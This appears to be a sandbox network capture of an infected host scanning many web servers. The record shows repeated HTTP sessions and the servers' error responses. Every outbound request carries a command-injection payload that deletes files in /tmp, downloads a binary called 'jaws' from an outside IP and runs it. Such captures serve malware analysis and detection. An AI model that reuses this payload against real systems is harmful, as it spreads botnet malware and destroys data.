                                                            Jan 26, 2024 15:31:31.712801933 CET858INData Raw: 6c 73 65 0d 0a 7b 0d 0a 76 61 72 20 4c 69 73 74 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 70 6c 69 74 28 22 3a 22 29 3b 0d 0a 69 66 28 4c 69 73 74 2e 6c 65 6e 67 74 68 20 3e 3d 20 33 29 0d 0a 7b 0d 0a 2f 2a 20 69 6e 63 6c 75 64 65 20 74 77 6f 20 6f
                                                            Data Ascii: lse{var List = HostInfo.split(":");if(List.length >= 3){/* include two or more than two ":" */if(true == IsIPv6AddressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            128192.168.2.2360800196.51.30.12280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:32.888328075 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.061732054 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: squid/3.5.20
                                                            Mime-Version: 1.0
                                                            Date: Fri, 26 Jan 2024 10:17:27 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3536
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')
                                                            Jan 26, 2024 15:31:33.061748981 CET1286INData Raw: 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20
                                                            Data Ascii: no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content
                                                            Jan 26, 2024 15:31:33.061785936 CET1220INData Raw: 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77
                                                            Data Ascii: sted URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws">/shell?cd+/tmp;rm+-rf+*;wget+


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            129192.168.2.2343640190.188.119.23780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:32.992615938 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.276355028 CET509INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:31:31 GMT
                                                            Server: lighttpd
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            130192.168.2.2334690168.188.78.12980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:32.999864101 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.863081932 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:35.590858936 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:39.239347935 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:46.153369904 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:59.971509933 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:27.871555090 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            131192.168.2.234395066.228.50.1580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.008718014 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.129755974 CET468INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Server: Apache/2.4.7 (Ubuntu)
                                                            Content-Length: 277
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            132192.168.2.233517413.245.236.18680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.077577114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.440365076 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            133192.168.2.235334618.169.247.8280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.204598904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            134192.168.2.2341126201.0.234.4280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.229715109 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.467278957 CET159INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=utf-8
                                                            Date: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Connection: close
                                                            Content-Length: 2959
                                                            Data Raw: 3c
                                                            Data Ascii: <
                                                            Jan 26, 2024 15:31:33.467339039 CET1286INData Raw: 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 61 63 65 62 6f 6f 6b 20 7c 20 45 72 72 6f 72
                                                            Data Ascii: !DOCTYPE html><html lang="en" id="facebook"> <head> <title>Facebook | Error</title> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta h
                                                            Jan 26, 2024 15:31:33.467355013 CET1286INData Raw: 6b 5f 32 78 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 72 65 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 73 6f 72 72 79 22 3e 53 6f 72 72 79 2c
                                                            Data Ascii: k_2x.png" /> </a> </div> <div id="core"> <h1 id="sorry">Sorry, something went wrong.</h1> <p id="promise"> We're working on it and we'll get it fixed as soon as we can. </p> <p id="back-link">
                                                            Jan 26, 2024 15:31:33.467369080 CET422INData Raw: 31 36 70 78 27 3b 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 20 3c 20 31 35 30 29 20 7b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79
                                                            Data Ascii: 16px'; }; if (window.innerWidth < 150) { document.getElementById('promise').style.display = 'none'; }; if (window.innerHeight < 150) { document.getElementById('sorry').style.margin = '4px 0 0 0';


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            135192.168.2.235497823.77.215.3980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.317181110 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.641933918 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 61 35 37 33 32 62 38 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 33 26 23 34 36 3b 31 39 62 61 30 36 38 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9a5732b8&#46;1706279493&#46;19ba0681</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            136192.168.2.233672613.33.79.19280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.398550034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.731551886 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            137192.168.2.2350196119.63.71.3580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.480875969 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.830660105 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:35 GMT
                                                            Server: Apache/2.4.18 (Ubuntu)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            138192.168.2.2348080161.111.10.10080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.835673094 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            139192.168.2.234218623.33.209.7480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:33.844676971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:34.048918009 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:33 GMT
                                                            Connection: close
